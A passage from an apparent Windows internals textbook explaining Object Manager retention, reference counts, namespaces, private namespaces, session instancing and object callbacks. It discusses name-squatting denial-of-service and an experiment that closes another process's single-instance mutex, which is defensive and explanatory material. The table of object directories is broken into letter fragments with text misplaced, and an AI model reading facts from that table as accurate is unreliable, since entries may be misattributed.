RW DESKTOP-SVVLOTP\aione-S-1-5-5-0-841005
RW BUILTIN\Administrators
R Everyone
NT AUTHORITY\RESTRICTED
Windows also supports Ex (Extended) versions of the APIs
—CreateEventEx, CreateMutexEx, CreateSemaphoreEx—that add another
argument for specifying the access mask. This makes it possible for
applications to use discretionary access control lists (DACLs) to properly
secure their objects without breaking their ability to use the create object
APIs to open a handle to them. You might be wondering why a client
application would not simply use OpenEvent, which does support a desired
access argument. Using the open object APIs leads to an inherent race
condition when dealing with a failure in the open call—that is, when the
client application has attempted to open the event before it has been created.
In most applications of this kind, the open API is followed by a create API in
the failure case. Unfortunately, there is no guaranteed way to make this
create operation atomic—in other words, to occur only once.
Indeed, it would be possible for multiple threads and/or processes to have
executed the create API concurrently, and all attempt to create the event at
the same time. This race condition and the extra complexity required to try to
handle it makes using the open object APIs an inappropriate solution to the
problem, which is why the Ex APIs should be used instead.
Object retention
There are two types of objects: temporary and permanent. Most objects are
temporary—that is, they remain while they are in use and are freed when they
are no longer needed. Permanent objects remain until they are explicitly
freed. Because most objects are temporary, the rest of this section describes
how the Object Manager implements object retention—that is, retaining
temporary objects only as long as they are in use and then deleting them.
Because all user-mode processes that access an object must first open a
handle to it, the Object Manager can easily track how many of these
processes, and which ones, are using an object. Tracking these handles
represents one part of implementing retention. The Object Manager
implements object retention in two phases. The first phase is called name
retention, and it is controlled by the number of open handles to an object that
exists. Every time a process opens a handle to an object, the Object Manager
increments the open handle counter in the object’s header. As processes
finish using the object and close their handles to it, the Object Manager
decrements the open handle counter. When the counter drops to 0, the Object
Manager deletes the object’s name from its global namespace. This deletion
prevents processes from opening a handle to the object.
The second phase of object retention is to stop retaining the objects
themselves (that is, to delete them) when they are no longer in use. Because
operating system code usually accesses objects by using pointers instead of
handles, the Object Manager must also record how many object pointers it
has dispensed to operating system processes. As we saw, it increments a
reference count for an object each time it gives out a pointer to the object,
which is called the pointer count; when kernel-mode components finish using
the pointer, they call the Object Manager to decrement the object’s reference
count. The system also increments the reference count when it increments the
handle count, and likewise decrements the reference count when the handle
count decrements because a handle is also a reference to the object that must
be tracked.
Finally, we also described usage reference count, which adds cached
references to the pointer count and is decremented each time a process uses a
handle. The usage reference count has been added since Windows 8 for
performance reasons. When the kernel is asked to obtain the object pointer
from its handle, it can do the resolution without acquiring the global handle
table lock. This means that in newer versions of Windows, the handle table
entry described in the “Object handles and the process handle table” section
earlier in this chapter contains a usage reference counter, which is initialized
the first time an application or a kernel driver uses the handle to the object.
Note that in this context, the verb use refers to the act of resolving the object
pointer from its handle, an operation performed in kernel by APIs like the
ObReferenceObjectByHandle.
Let’s explain the three counts through an example, like the one shown in
Figure 8-35. The image represents two event objects that are in use in a 64-
bit system. Process A creates the first event, obtaining a handle to it. The
event has a name, which implies that the Object Manager inserts it in the
correct directory object (\BaseNamedObjects, for example), assigning an
initial reference count to 2 and the handle count to 1. After initialization is
complete, Process A waits on the first event, an operation that allows the
kernel to use (or reference) the handle to it, which assigns the handle’s usage
reference count to 32,767 (0x7FFF in hexadecimal, which sets 15 bits to 1).
This value is added to the first event object’s reference count, which is also
increased by one, bringing the final value to 32,770 (while the handle count
is still 1.)
Figure 8-35 Handles and reference counts.
Process B initializes, creates the second named event, and signals it. The
last operation uses (references) the second event, allowing it also to reach a
reference value of 32,770. Process B then opens the first event (allocated by
process A). The operation lets the kernel create a new handle (valid only in
the Process B address space), which adds both a handle count and reference
count to the first event object, bringing its counters to 2 and 32,771.
(Remember, the new handle table entry still has its usage reference count
uninitialized.) Process B, before signaling the first event, uses its handle three
times: the first operation initializes the handle’s usage reference count to
32,767. The value is added to the object reference count, which is further
increased by 1 unit, and reaches the overall value of 65,539. Subsequent
operations on the handle simply decreases the usage reference count without
touching the object’s reference count. When the kernel finishes using an
object, it always dereferences its pointer, though—an operation that releases
a reference count on the kernel object. Thus, after the four uses (including the
signaling operation), the first object reaches a handle count of 2 and
reference count of 65,535. In addition, the first event is being referenced by
some kernel-mode structure, which brings its final reference count to 65,536.
When a process closes a handle to an object (an operation that causes the
NtClose routine to be executed in the kernel), the Object Manager knows that
it needs to subtract the handle usage reference counter from the object’s
reference counter. This allows the correct dereference of the handle. In the
example, even if Processes A and B both close their handles to the first
object, the object would continue to exist because its reference count will
become 1 (while its handle count would be 0). However, when Process B
closes its handle to the second event object, the object would be deallocated,
because its reference count reaches 0.
This behavior means that even after an object’s open handle counter
reaches 0, the object’s reference count might remain positive, indicating that
the operating system is still using the object in some way. Ultimately, it is
only when the reference count drops to 0 that the Object Manager deletes the
object from memory. This deletion has to respect certain rules and also
requires cooperation from the caller in certain cases. For example, because
objects can be present both in paged or nonpaged pool memory (depending
on the settings located in their object types), if a dereference occurs at an
IRQL level of DISPATCH_LEVEL or higher and this dereference causes the
pointer count to drop to 0, the system would crash if it attempted to
immediately free the memory of a paged-pool object. (Recall that such access
is illegal because the page fault will never be serviced.) In this scenario, the
Object Manager performs a deferred delete operation, queuing the operation
on a worker thread running at passive level (IRQL 0). We’ll describe more
about system worker threads later in this chapter.
Another scenario that requires deferred deletion is when dealing with
Kernel Transaction Manager (KTM) objects. In some scenarios, certain
drivers might hold a lock related to this object, and attempting to delete the
object will result in the system attempting to acquire this lock. However, the
driver might never get the chance to release its lock, causing a deadlock.
When dealing with KTM objects, driver developers must use
ObDereferenceObjectDeferDelete to force deferred deletion regardless of
IRQL level. Finally, the I/O manager also uses this mechanism as an
optimization so that certain I/Os can complete more quickly, instead of
waiting for the Object Manager to delete the object.
Because of the way object retention works, an application can ensure that
an object and its name remain in memory simply by keeping a handle open to
the object. Programmers who write applications that contain two or more
cooperating processes need not be concerned that one process might delete
an object before the other process has finished using it. In addition, closing
an application’s object handles won’t cause an object to be deleted if the
operating system is still using it. For example, one process might create a
second process to execute a program in the background; it then immediately
closes its handle to the process. Because the operating system needs the
second process to run the program, it maintains a reference to its process
object. Only when the background program finishes executing does the
Object Manager decrement the second process’s reference count and then
delete it.
Because object leaks can be dangerous to the system by leaking kernel
pool memory and eventually causing systemwide memory starvation—and
can break applications in subtle ways—Windows includes a number of
debugging mechanisms that can be enabled to monitor, analyze, and debug
issues with handles and objects. Additionally, WinDbg comes with two
extensions that tap into these mechanisms and provide easy graphical
analysis. Table 8-24 describes them.
Table 8-24 Debugging mechanisms for object handles
Mechan
ism
Enabled By
Kernel
Debugger
Extension
Handle
Tracing
Database
Kernel Stack Trace systemwide and/or per-
process with the User Stack Trace option
checked with Gflags.exe
!htrace
<handle
value>
<process ID>
Object
Referenc
e
Tracing
Per-process-name(s), or per-object-type-
pool-tag(s), with Gflags.exe, under Object
Reference Tracing
!obtrace
<object
pointer>
Object
Referenc
e
Tagging
Drivers must call appropriate API
N/A
Enabling the handle-tracing database is useful when attempting to
understand the use of each handle within an application or the system
context. The !htrace debugger extension can display the stack trace captured
at the time a specified handle was opened. After you discover a handle leak,
the stack trace can pinpoint the code that is creating the handle, and it can be
analyzed for a missing call to a function such as CloseHandle.
The object-reference-tracing !obtrace extension monitors even more by
showing the stack trace for each new handle created as well as each time a
handle is referenced by the kernel (and each time it is opened, duplicated, or
inherited) and dereferenced. By analyzing these patterns, misuse of an object
at the system level can be more easily debugged. Additionally, these
reference traces provide a way to understand the behavior of the system when
dealing with certain objects. Tracing processes, for example, display
references from all the drivers on the system that have registered callback
notifications (such as Process Monitor) and help detect rogue or buggy third-
party drivers that might be referencing handles in kernel mode but never
dereferencing them.
Note
When enabling object-reference tracing for a specific object type, you can
obtain the name of its pool tag by looking at the key member of the
OBJECT_TYPE structure when using the dx command. Each object type
on the system has a global variable that references this structure—for
example, PsProcessType. Alternatively, you can use the !object
command, which displays the pointer to this structure.
Unlike the previous two mechanisms, object-reference tagging is not a
debugging feature that must be enabled with global flags or the debugger but
rather a set of APIs that should be used by device-driver developers to
reference and dereference objects, including ObReferenceObjectWithTag and
ObDereferenceObjectWithTag. Similar to pool tagging (see Chapter 5 in Part
1 for more information on pool tagging), these APIs allow developers to
supply a four-character tag identifying each reference/dereference pair. When
using the !obtrace extension just described, the tag for each reference or
dereference operation is also shown, which avoids solely using the call stack
as a mechanism to identify where leaks or under-references might occur,
especially if a given call is performed thousands of times by the driver.
Resource accounting
Resource accounting, like object retention, is closely related to the use of
object handles. A positive open handle count indicates that some process is
using that resource. It also indicates that some process is being charged for
the memory the object occupies. When an object’s handle count and
reference count drop to 0, the process that was using the object should no
longer be charged for it.
Many operating systems use a quota system to limit processes’ access to
system resources. However, the types of quotas imposed on processes are
sometimes diverse and complicated, and the code to track the quotas is
spread throughout the operating system. For example, in some operating
systems, an I/O component might record and limit the number of files a
process can open, whereas a memory component might impose a limit on the
amount of memory that a process’s threads can allocate. A process
component might limit users to some maximum number of new processes
they can create or a maximum number of threads within a process. Each of
these limits is tracked and enforced in different parts of the operating system.
In contrast, the Windows Object Manager provides a central facility for
resource accounting. Each object header contains an attribute called quota
charges that records how much the Object Manager subtracts from a
process’s allotted paged and/or nonpaged pool quota when a thread in the
process opens a handle to the object.
Each process on Windows points to a quota structure that records the
limits and current values for nonpaged-pool, paged-pool, and page-file usage.
These quotas default to 0 (no limit) but can be specified by modifying
registry values. (You need to add/edit NonPagedPoolQuota,
PagedPoolQuota, and PagingFileQuota under
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management.) Note that all the processes in an interactive session share the
same quota block (and there’s no documented way to create processes with
their own quota blocks).
Object names
An important consideration in creating a multitude of objects is the need to
devise a successful system for keeping track of them. The Object Manager
requires the following information to help you do so:
■ A way to distinguish one object from another
■ A method for finding and retrieving a particular object
The first requirement is served by allowing names to be assigned to
objects. This is an extension of what most operating systems provide—the
ability to name selected resources, files, pipes, or a block of shared memory,
for example. The executive, in contrast, allows any resource represented by
an object to have a name. The second requirement, finding and retrieving an
object, is also satisfied by object names. If the Object Manager stores objects
by name, it can find an object by looking up its name.
Object names also satisfy a third requirement, which is to allow processes
to share objects. The executive’s object namespace is a global one, visible to
all processes in the system. One process can create an object and place its
name in the global namespace, and a second process can open a handle to the
object by specifying the object’s name. If an object isn’t meant to be shared
in this way, its creator doesn’t need to give it a name.
To increase efficiency, the Object Manager doesn’t look up an object’s
name each time someone uses the object. Instead, it looks up a name under
only two circumstances. The first is when a process creates a named object:
the Object Manager looks up the name to verify that it doesn’t already exist
before storing the new name in the global namespace. The second is when a
process opens a handle to a named object: The Object Manager looks up the
name, finds the object, and then returns an object handle to the caller;
thereafter, the caller uses the handle to refer to the object. When looking up a
name, the Object Manager allows the caller to select either a case-sensitive or
case-insensitive search, a feature that supports Windows Subsystem for
Linux (WSL) and other environments that use case-sensitive file names.
Object directories
The object directory object is the Object Manager’s means for supporting this
hierarchical naming structure. This object is analogous to a file system
directory and contains the names of other objects, possibly even other object
directories. The object directory object maintains enough information to
translate these object names into pointers to the object headers of the objects
themselves. The Object Manager uses the pointers to construct the object
handles that it returns to user-mode callers. Both kernel-mode code
(including executive components and device drivers) and user-mode code
(such as subsystems) can create object directories in which to store objects.
Objects can be stored anywhere in the namespace, but certain object types
will always appear in certain directories due to the fact they are created by a
specialized component in a specific way. For example, the I/O manager
creates an object directory named \Driver, which contains the names of
objects representing loaded non-file-system kernel-mode drivers. Because the
I/O manager is the only component responsible for the creation of Driver
objects (through the IoCreateDriver API), only Driver objects should exist
there.
Table 8-25 lists the standard object directories found on all Windows
systems and what types of objects you can expect to see stored there. Of the
directories listed, only \AppContainerNamedObjects, \BaseNamedObjects,
and \Global?? are generically available for use by standard Win32 or UWP
applications that stick to documented APIs. (See the “Session namespace”
section later in this chapter for more information.)
Table 8-25 Standard object directories
D
ir
ec
to
ry
Types of Object Names Stored
\
A
p
p
C
o
nt
ai
ne
r
N
a
m
ed
O
Only present under the \Sessions object directory for non-Session 0
interactive sessions; contains the named kernel objects created by
Win32 or UWP APIs from within processes that are running in an
App Container.
bj
ec
ts
\
A
rc
N
a
m
e
Symbolic links mapping ARC-style paths to NT-style paths.
\B
as
e
N
a
m
ed
O
bj
ec
ts
Global mutexes, events, semaphores, waitable timers, jobs, ALPC
ports, symbolic links, and section objects.
\C
al
lb
ac
k
Callback objects (which only drivers can create).
\
D
ev
ic
e
Device objects owned by most drivers except file system and filter
manager devices, plus the VolumesSafeForWriteAccess event, and
certain symbolic links such as SystemPartition and BootPartition.
Also contains the PhysicalMemory section object that allows direct
access to RAM by kernel components. Finally, contains certain
object directories, such as Http used by the Http.sys accelerator
driver, and HarddiskN directories for each physical hard drive.
\
D
ri
ve
r
Driver objects whose type is not “File System Driver” or “File
System Recognizer” (SERVICE_FILE_SYSTEM_DRIVER or
SERVICE_RECOGNIZER_DRIVER).
\
D
ri
ve
rS
to
re
(s
)
Symbolic links for locations where OS drivers can be installed and
managed from. Typically, at least SYSTEM which points to
\SystemRoot, but can contain more entries on Windows 10X
devices.
\F
il
e
S
ys
te
m
File-system driver objects (SERVICE_FILE_SYSTEM_DRIVER)
and file-system recognizer (SERVICE_RECOGNIZER_DRIVER)
driver and device objects. The Filter Manager also creates its own
device objects under the Filters object directory.
\
G
L
O
B
A
L
??
Symbolic link objects that represent MS-DOS device names. (The
\Sessions\0\DosDevices\<LUID>\Global directories are symbolic
links to this directory.)
\
Contains event objects that signal kernel pool resource conditions,
K
er
ne
l
O
bj
ec
ts
the completion of certain operating system tasks, as well as Session
objects (at least Session0) representing each interactive session,
and Partition objects (at least MemoryPartition0) for each memory
partition. Also contains the mutex used to synchronize access to the
Boot Configuration Database (BC). Finally, contains dynamic
symbolic links that use a custom callback to refer to the correct
partition for physical memory and commit resource conditions, and
for memory error detection.
\
K
n
o
w
n
D
lls
Section objects for the known DLLs mapped by SMSS at startup
time, and a symbolic link containing the path for known DLLs.
\
K
n
o
w
n
D
lls
3
2
On a 64-bit Windows installation, \KnownDlls contains the native
64-bit binaries, so this directory is used instead to store WoW64
32-bit versions of those DLLs.
\
N
L
S
Section objects for mapped national language support (NLS) tables.
\
O
Object type objects for each object type created by
ObCreateObjectTypeEx.
bj
ec
tT
y
pe
s
\R
P
C
C
o
nt
ro
l
ALPC ports created to represent remote procedure call (RPC)
endpoints when Local RPC (ncalrpc) is used. This includes
explicitly named endpoints, as well as auto-generated COM
(OLEXXXXX) port names and unnamed ports (LRPC-XXXX,
where XXXX is a randomly generated hexadecimal value).
\S
ec
ur
it
y
ALPC ports and events used by objects specific to the security
subsystem.
\S
es
si
o
ns
Per-session namespace directory. (See the next subsection.)
\S
il
o
If at least one Windows Server Container has been created, such as
by using Docker for Windows with non-VM containers, contains
object directories for each Silo ID (the Job ID of the root job for the
container), which then contain the object namespace local to that
Silo.
\
U
ALPC ports used by the User-Mode Driver Framework (UMDF).
M
D
F
C
o
m
m
u
ni
ca
ti
o
n
P
or
ts
\
V
m
S
ha
re
d
M
e
m
or
y
Section objects used by virtualized instances (VAIL) of
Win32k.sys and other window manager components on Windows
10X devices when launching legacy Win32 applications. Also
contains the Host object directory to represent the other side of
the connection.
\
W
in
d
o
w
s
Windows subsystem ALPC ports, shared section, and window
stations in the WindowStations object directory. Desktop Window
Manager (DWM) also stores its ALPC ports, events, and shared
sections in this directory, for non-Session 0 sessions. Finally, stores
the Themes service section object.
Object names are global to a single computer (or to all processors on a
multiprocessor computer), but they’re not visible across a network. However,
the Object Manager’s parse method makes it possible to access named
objects that exist on other computers. For example, the I/O manager, which
supplies file-object services, extends the functions of the Object Manager to
remote files. When asked to open a remote file object, the Object Manager
calls a parse method, which allows the I/O manager to intercept the request
and deliver it to a network redirector, a driver that accesses files across the
network. Server code on the remote Windows system calls the Object
Manager and the I/O manager on that system to find the file object and return
the information back across the network.
Because the kernel objects created by non-app-container processes,
through the Win32 and UWP API, such as mutexes, events, semaphores,
waitable timers, and sections, have their names stored in a single object
directory, no two of these objects can have the same name, even if they are of
a different type. This restriction emphasizes the need to choose names
carefully so that they don’t collide with other names. For example, you could
prefix names with a GUID and/or combine the name with the user’s security
identifier (SID)—but even that would only help with a single instance of an
application per user.
The issue with name collision may seem innocuous, but one security
consideration to keep in mind when dealing with named objects is the
possibility of malicious object name squatting. Although object names in
different sessions are protected from each other, there’s no standard
protection inside the current session namespace that can be set with the
standard Windows API. This makes it possible for an unprivileged
application running in the same session as a privileged application to access
its objects, as described earlier in the object security subsection.
Unfortunately, even if the object creator used a proper DACL to secure the
object, this doesn’t help against the squatting attack, in which the
unprivileged application creates the object before the privileged application,
thus denying access to the legitimate application.
Windows exposes the concept of a private namespace to alleviate this
issue. It allows user-mode applications to create object directories through
the CreatePrivateNamespace API and associate these directories with
boundary descriptors created by the CreateBoundaryDescriptor API, which
are special data structures protecting the directories. These descriptors
contain SIDs describing which security principals are allowed access to the
object directory. In this manner, a privileged application can be sure that
unprivileged applications will not be able to conduct a denial-of-service
attack against its objects. (This doesn’t stop a privileged application from
doing the same, however, but this point is moot.) Additionally, a boundary
descriptor can also contain an integrity level, protecting objects possibly
belonging to the same user account as the application based on the integrity
level of the process. (See Chapter 7 of Part 1 for more information on
integrity levels.)
One of the things that makes boundary descriptors effective mitigations
against squatting attacks is that unlike objects, the creator of a boundary
descriptor must have access (through the SID and integrity level) to the
boundary descriptor. Therefore, an unprivileged application can only create
an unprivileged boundary descriptor. Similarly, when an application wants to
open an object in a private namespace, it must open the namespace using the
same boundary descriptor that was used to create it. Therefore, a privileged
application or service would provide a privileged boundary descriptor, which
would not match the one created by the unprivileged application.
EXPERIMENT: Looking at the base named objects
and private objects
You can see the list of base objects that have names with the
WinObj tool from Sysinternals or with WinObjEx64. However, in
this experiment, we use WinObjEx64 because it supports additional
object types and because it can also show private namespaces. Run
Winobjex64.exe, and click the BaseNamedObjects node in the tree,
as shown here:
The named objects are listed on the right. The icons indicate the
object type:
■ Mutexes are indicated with a stop sign.
■ Sections (Windows file-mapping objects) are shown as
memory chips.
■ Events are shown as exclamation points.
■ Semaphores are indicated with an icon that resembles a
traffic signal.
■ Symbolic links have icons that are curved arrows.
■ Folders indicate object directories.
■ Power/network plugs represent ALPC ports.
■ Timers are shown as Clocks.
■ Other icons such as various types of gears, locks, and chips
are used for other object types.
Now use the Extras menu and select Private Namespaces.
You’ll see a list, such as the one shown here:
For each object, you’ll see the name of the boundary descriptor
(for example, the Installing mutex is part of the LoadPerf
boundary), and the SID(s) and integrity level associated with it (in
this case, no explicit integrity is set, and the SID is the one for the
Administrators group). Note that for this feature to work, you must
have enabled kernel debugging on the machine the tool is running
on (either locally or remotely), as WinObjEx64 uses the WinDbg
local kernel debugging driver to read kernel memory.
EXPERIMENT: Tampering with single instancing
Applications such as Windows Media Player and those in
Microsoft Office are common examples of single-instancing
enforcement through named objects. Notice that when launching
the Wmplayer.exe executable, Windows Media Player appears only
once—every other launch simply results in the window coming
back into focus. You can tamper with the handle list by using
Process Explorer to turn the computer into a media mixer! Here’s
how:
1.
Launch Windows Media Player and Process Explorer to
view the handle table (by clicking View, Lower Pane View,
and then Handles). You should see a handle whose name
contains
Microsoft_WMP_70_CheckForOtherInstanceMutex, as
shown in the figure.
2.
Right-click the handle and select Close Handle. Confirm
the action when asked. Note that Process Explorer should
be started as Administrator to be able to close a handle in
another process.
3.
Run Windows Media Player again. Notice that this time a
second process is created.
4.
Go ahead and play a different song in each instance. You
can also use the Sound Mixer in the system tray (click the
Volume icon) to select which of the two processes will
have greater volume, effectively creating a mixing
environment.
Instead of closing a handle to a named object, an application
could have run on its own before Windows Media Player and
created an object with the same name. In this scenario, Windows
Media Player would never run because it would be fooled into
believing it was already running on the system.
Symbolic links
In certain file systems (on NTFS, Linux, and macOS systems, for example), a
symbolic link lets a user create a file name or a directory name that, when
used, is translated by the operating system into a different file or directory
name. Using a symbolic link is a simple method for allowing users to
indirectly share a file or the contents of a directory, creating a cross-link
between different directories in the ordinarily hierarchical directory structure.
The Object Manager implements an object called a symbolic link object,
which performs a similar function for object names in its object namespace.
A symbolic link can occur anywhere within an object name string. When a
caller refers to a symbolic link object’s name, the Object Manager traverses
its object namespace until it reaches the symbolic link object. It looks inside
the symbolic link and finds a string that it substitutes for the symbolic link
name. It then restarts its name lookup.
One place in which the executive uses symbolic link objects is in
translating MS-DOS-style device names into Windows internal device
names. In Windows, a user refers to hard disk drives using the names C:, D:,
and so on, and serial ports as COM1, COM2, and so on. The Windows
subsystem creates these symbolic link objects and places them in the Object
Manager namespace under the \Global?? directory, which can also be done
for additional drive letters through the DefineDosDevice API.
In some cases, the underlying target of the symbolic link is not static and
may depend on the caller’s context. For example, older versions of Windows
had an event in the \KernelObjects directory called LowMemoryCondition,
but due to the introduction of memory partitions (described in Chapter 5 of
Part 1), the condition that the event signals are now dependent on which
partition the caller is running in (and should have visibility of). As such,
there is now a LowMemoryCondition event for each memory partition, and
callers must be redirected to the correct event for their partition. This is
achieved with a special flag on the object, the lack of a target string, and the
existence of a symbolic link callback executed each time the link is parsed by
the Object Manager. With WinObjEx64, you can see the registered callback,
as shown in the screenshot in Figure 8-36 (you could also use the debugger
by doing a !object \KernelObjects\LowMemoryCondition command and
then dumping the _OBJECT_SYMBOLIC_LINK structure with the dx
command.)
Figure 8-36 The LowMemoryCondition symbolic link redirection
callback.
Session namespace
Services have full access to the global namespace, a namespace that serves as
the first instance of the namespace. Regular user applications then have read-
write (but not delete) access to the global namespace (minus some exceptions
we explain soon.) In turn, however, interactive user sessions are then given a
session-private view of the namespace known as a local namespace. This
namespace provides full read/write access to the base named objects by all
applications running within that session and is also used to isolate certain
Windows subsystem-specific objects, which are still privileged. The parts of
the namespace that are localized for each session include \DosDevices,
\Windows, \BaseNamedObjects, and \AppContainerNamedObjects.
Making separate copies of the same parts of the namespace is known as
instancing the namespace. Instancing \DosDevices makes it possible for each
user to have different network drive letters and Windows objects such as
serial ports. On Windows, the global \DosDevices directory is named
\Global?? and is the directory to which \DosDevices points, and local
\DosDevices directories are identified by the logon session ID.
The \Windows directory is where Win32k.sys inserts the interactive
window station created by Winlogon, \WinSta0. A Terminal Services
environment can support multiple interactive users, but each user needs an
individual version of WinSta0 to preserve the illusion that he is accessing the
predefined interactive window station in Windows. Finally, regular Win32
applications and the system create shared objects in \BaseNamedObjects,
including events, mutexes, and memory sections. If two users are running an
application that creates a named object, each user session must have a private
version of the object so that the two instances of the application don’t
interfere with one another by accessing the same object. If the Win32
application is running under an AppContainer, however, or is a UWP
application, then the sandboxing mechanisms prevent it from accessing
\BaseNamedObjects, and the \AppContainerNamedObjects object directory
is used instead, which then has further subdirectories whose names
correspond to the Package SID of the AppContainer (see Chapter 7 of Part 1,
for more information on AppContainer and the Windows sandboxing model).
The Object Manager implements a local namespace by creating the private
versions of the four directories mentioned under a directory associated with
the user’s session under \Sessions\n (where n is the session identifier). When
a Windows application in remote session two creates a named event, for
example, the Win32 subsystem (as part of the
BaseGetNamedObjectDirectory API in Kernelbase.dll) transparently
redirects the object’s name from \BaseNamedObjects to
\Sessions\2\BaseNamedObjects, or, in the case of an AppContainer, to
\Sessions\2\AppContainerNamedObjects\<PackageSID>\.
One more way through which name objects can be accessed is through a
security feature called Base Named Object (BNO) Isolation. Parent processes
can launch a child with the ProcThreadAttributeBnoIsolation process
attribute (see Chapter 3 of Part 1 for more information on a process’s startup
attributes), supplying a custom object directory prefix. In turn, this makes
KernelBase.dll create the directory and initial set of objects (such as
symbolic links) to support it, and then have NtCreateUserProcess set the
prefix (and related initial handles) in the Token object of the child process
(specifically, in the BnoIsolationHandlesEntry field) through the data in the
native version of process attribute.
Later, BaseGetNamedObjectDirectory queries the Token object to check if
BNO Isolation is enabled, and if so, it appends this prefix to any named
object operation, such that \Sessions\2\BaseNamedObjects will, for example,
become \Sessions\2\BaseNamedObjects\IsolationExample. This can be used
to create a sort of sandbox for a process without having to use the
AppContainer functionality.
All object-manager functions related to namespace management are aware
of the instanced directories and participate in providing the illusion that all
sessions use the same namespace. Windows subsystem DLLs prefix names
passed by Windows applications that reference objects in the \DosDevices
directory with \?? (for example, C:\Windows becomes \??\C:\Windows).
When the Object Manager sees the special \?? prefix, the steps it takes
depend on the version of Windows, but it always relies on a field named
DeviceMap in the executive process object (EPROCESS, which is described
further in Chapter 3 of Part 1) that points to a data structure shared by other
processes in the same session.
The DosDevicesDirectory field of the DeviceMap structure points at the
Object Manager directory that represents the process’ local \DosDevices.
When the Object Manager sees a reference to \??, it locates the process’ local
\DosDevices by using the DosDevicesDirectory field of the DeviceMap. If
the Object Manager doesn’t find the object in that directory, it checks the
DeviceMap field of the directory object. If it’s valid, it looks for the object in
the directory pointed to by the GlobalDosDevicesDirectory field of the
DeviceMap structure, which is always \Global??.
Under certain circumstances, session-aware applications need to access
objects in the global session even if the application is running in another
session. The application might want to do this to synchronize with instances
of itself running in other remote sessions or with the console session (that is,
session 0). For these cases, the Object Manager provides the special override
\Global that an application can prefix to any object name to access the global
namespace. For example, an application in session two opening an object
named \Global\ApplicationInitialized is directed to
\BaseNamedObjects\ApplicationInitialized instead of
\Sessions\2\BaseNamedObjects\ApplicationInitialized.
An application that wants to access an object in the global \DosDevices
directory does not need to use the \Global prefix as long as the object doesn’t
exist in its local \DosDevices directory. This is because the Object Manager
automatically looks in the global directory for the object if it doesn’t find it in
the local directory. However, an application can force checking the global
directory by using \GLOBALROOT.
Session directories are isolated from each other, but as mentioned earlier,
regular user applications can create a global object with the \Global prefix.
However, an important security mitigation exists: Section and symbolic link
objects cannot be globally created unless the caller is running in Session 0 or
if the caller possesses a special privilege named create global object, unless
the object’s name is part of an authorized list of “unsecured names,” which is
stored in HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\kernel, under the ObUnsecureGlobalNames value. By default, these
names are usually listed:
■ netfxcustomperfcounters.1.0
■ SharedPerfIPCBlock
■ Cor_Private_IPCBlock
■ Cor_Public_IPCBlock_
EXPERIMENT: Viewing namespace instancing
You can see the separation between the session 0 namespace and
other session namespaces as soon as you log in. The reason you can
is that the first console user is logged in to session 1 (while services
run in session 0). Run Winobj.exe as Administrator and click the
\Sessions directory. You’ll see a subdirectory with a numeric name
for each active session. If you open one of these directories, you’ll
see subdirectories named DosDevices, Windows,
AppContainerNamedObjects, and BaseNamedObjects, which are
the local namespace subdirectories of the session. The following
figure shows a local namespace:
Next, run Process Explorer and select a process in your session
(such as Explorer.exe), and then view the handle table (by clicking
View, Lower Pane View, and then Handles). You should see a
handle to \Windows\WindowStations\WinSta0 underneath
\Sessions\n, where n is the session ID.
Object filtering
Windows includes a filtering model in the Object Manager, akin to the file
system minifilter model and the registry callbacks mentioned in Chapter 10.
One of the primary benefits of this filtering model is the ability to use the
altitude concept that these existing filtering technologies use, which means
that multiple drivers can filter Object Manager events at appropriate locations
in the filtering stack. Additionally, drivers are permitted to intercept calls
such as NtOpenThread and NtOpenProcess and even to modify the access
masks being requested from the process manager. This allows protection
against certain operations on an open handle—such as preventing a piece of
malware from terminating a benevolent security process or stopping a
password dumping application from obtaining read memory permissions on
the LSA process. Note, however, that an open operation cannot be entirely
blocked due to compatibility issues, such as making Task Manager unable to
query the command line or image name of a process.
Furthermore, drivers can take advantage of both pre and post callbacks,
allowing them to prepare for a certain operation before it occurs, as well as to
react or finalize information after the operation has occurred. These callbacks
can be specified for each operation (currently, only open, create, and
duplicate are supported) and be specific for each object type (currently, only
process, thread, and desktop objects are supported). For each callback,
drivers can specify their own internal context value, which can be returned
across all calls to the driver or across a pre/post pair. These callbacks can be
registered with the ObRegisterCallbacks API and unregistered with the
ObUnregisterCallbacks API—it is the responsibility of the driver to ensure
deregistration happens.
Use of the APIs is restricted to images that have certain characteristics:
■ The image must be signed, even on 32-bit computers, according to the
same rules set forth in the Kernel Mode Code Signing (KMCS)
policy. The image must be compiled with the /integritycheck linker
flag, which sets the
IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY value in the
PE header. This instructs the memory manager to check the signature
of the image regardless of any other defaults that might not normally
result in a check.
■ The image must be signed with a catalog containing cryptographic
per-page hashes of the executable code. This allows the system to
detect changes to the image after it has been loaded in memory.
Before executing a callback, the Object Manager calls the
MmVerifyCallbackFunction on the target function pointer, which in turn
locates the loader data table entry associated with the module owning this
address and verifies whether the LDRP_IMAGE_INTEGRITY_FORCED flag
is set.
Synchronization
The concept of mutual exclusion is a crucial one in operating systems
development. It refers to the guarantee that one, and only one, thread can
access a particular resource at a time. Mutual exclusion is necessary when a
resource doesn’t lend itself to shared access or when sharing would result in
an unpredictable outcome. For example, if two threads copy a file to a printer
port at the same time, their output could be interspersed. Similarly, if one
thread reads a memory location while another one writes to it, the first thread
will receive unpredictable data. In general, writable resources can’t be shared
without restrictions, whereas resources that aren’t subject to modification can
be shared. Figure 8-37 illustrates what happens when two threads running on
different processors both write data to a circular queue.
Figure 8-37 Incorrect sharing of memory.
Because the second thread obtained the value of the queue tail pointer
before the first thread finished updating it, the second thread inserted its data
into the same location that the first thread used, overwriting data and leaving
one queue location empty. Even though Figure 8-37 illustrates what could
happen on a multiprocessor system, the same error could occur on a single-
processor system if the operating system performed a context switch to the
second thread before the first thread updated the queue tail pointer.
Sections of code that access a nonshareable resource are called critical
sections. To ensure correct code, only one thread at a time can execute in a
critical section. While one thread is writing to a file, updating a database, or
modifying a shared variable, no other thread can be allowed to access the
same resource. The pseudocode shown in Figure 8-37 is a critical section that
incorrectly accesses a shared data structure without mutual exclusion.
The issue of mutual exclusion, although important for all operating
systems, is especially important (and intricate) for a tightly coupled,
symmetric multiprocessing (SMP) operating system such as Windows, in
which the same system code runs simultaneously on more than one
processor, sharing certain data structures stored in global memory. In
Windows, it is the kernel’s job to provide mechanisms that system code can
use to prevent two threads from modifying the same data at the same time.
The kernel provides mutual-exclusion primitives that it and the rest of the
executive use to synchronize their access to global data structures.
Because the scheduler synchronizes access to its data structures at
DPC/dispatch level IRQL, the kernel and executive cannot rely on
synchronization mechanisms that would result in a page fault or reschedule
